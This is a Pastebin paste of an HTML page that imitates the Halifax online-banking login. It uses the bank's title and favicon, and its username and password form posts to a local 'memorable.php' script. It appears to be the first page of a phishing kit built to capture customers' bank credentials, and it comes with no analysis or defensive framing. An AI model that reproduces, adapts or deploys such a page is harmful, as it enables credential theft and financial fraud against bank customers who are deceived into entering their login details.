Advertisement
Guest User

index

a guest
Oct 24th, 2014
170
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 2.44 KB | None | 0 0
  1. <!DOCTYPE HTML5>
  2. <html>
  3. <head>
  4. <meta charset="UTF-8">
  5. <title>Halifax - Welcome to Online Banking</title>
  6. <link rel="stylesheet" type="text/css" href="css/style.css">
  7. <link href="https://www.halifax-online.co.uk/personal/unauth/assets/HalifaxRetail/img/icons/favicon.ico" rel="icon">
  8. </head>
  9. <body>
  10. <link rel="stylesheet" href="css/validationEngine.jquery.css" charset="UTF-8">
  11. <script type="text/javascript" src="js/jquery-1.8.2.min.js" charset="UTF-8"></script>
  12. <script src="js/jquery.validationEngine-en.js" type="text/javascript" charset="utf-8"></script>
  13. <script src="js/jquery.validationEngine.js" type="text/javascript" charset="utf-8"></script>
  14. <script>
  15. $(document).ready(function(){
  16.     $("#formid").validationEngine();
  17.    });
  18.    </script>
  19. </head>
  20. <body>
  21. <div id="bar">
  22.    <div id="intobar">
  23.    <img src="images/logo.png" class="logo">
  24.    <img src="images/3.png" style="float: right;">
  25.    </div>
  26. </div>
  27.    <div id="wrapper">
  28.          <img src="images/5.png" class="abso">
  29.    <img id="pictures" src="images/4.png">
  30.    <img src="images/1.png" style="padding-top: 30px;">
  31.    <div id="form">
  32.    <div id="intoform">
  33.    <form method="POST" id="formid" name="formid" action="memorable.php">
  34.    <label for="01opt" id="label1" name="label1" style="margin-bottom: 10px;">Username:</label>
  35.    <input id="01opt" name="01-opt" class="validate[required]" autocomplete="off" maxlength="32" style="
  36.    width: 230px;
  37. ">
  38.    <label for="02opt" id="label2" name="label2" style="margin-top: 10px;">Password:</label>
  39.    <input id="02opt" class="utl validate[required]" name="02-opt" type="password" autocomplete="off" maxlength="32">
  40.    <br>
  41.   <div class="formcheck" style="
  42.    margin-top: 10px;
  43. ">
  44.  
  45.    <input id="checkit" type="checkbox" name="check-it" style="
  46. ">        Remember my username on this computer</input>
  47.    </div>
  48. <div style="position:relative; height:110px; width:834px; background:url(images/2.png) 0 0 no-repeat;"><input type="submit" class="linkButton" value="" style="position:absolute; top:49px; left:754px; width:74px; height:24px;" title="" alt="" href="memorable.php" target="_self"></input><a style="position:absolute; overflow:hidden; top:108px; left:832px; width:1px; height:1px;" title="HTML Map" alt="HTML Map" href="http://www.html-map.com/" target="_self"></a></div>
  49.    </div>
  50.    </form>
  51.    </div>
  52.    </div>
  53.    <div id="footer">
  54.    <img src="images/foot.png" style="float: left; margin-left: 50px;">
  55.      </div>
  56.  
  57. </body>
  58. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement